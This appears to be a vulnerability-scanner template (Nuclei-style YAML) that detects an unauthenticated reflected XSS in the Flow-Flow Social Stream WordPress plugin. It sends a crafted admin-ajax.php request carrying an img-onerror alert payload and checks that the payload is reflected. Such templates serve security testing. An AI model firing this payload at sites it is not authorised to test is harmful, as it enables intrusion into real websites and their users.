id: flow-flow-social-stream-xss

info:
  name: Flow-Flow Social Stream <= 3.0.71 - Unauthenticated Reflected XSS
  author: alph4byt3
  severity: medium
  reference:
    - https://wpscan.com/vulnerability/8354b34e-40f4-4b70-bb09-38e2cf572ce9
  tags: xss,wordpress

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=fetch_posts&stream-id=1&hash=%3Cimg%20src=x%20onerror=alert(document.domain)%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"hash":"<img src=x onerror=alert(document.domain)>"'
          - '"errors"'
        condition: and

      - type: word
        part: header
        words:
          - 'text/html'

      - type: status
        status:
          - 200
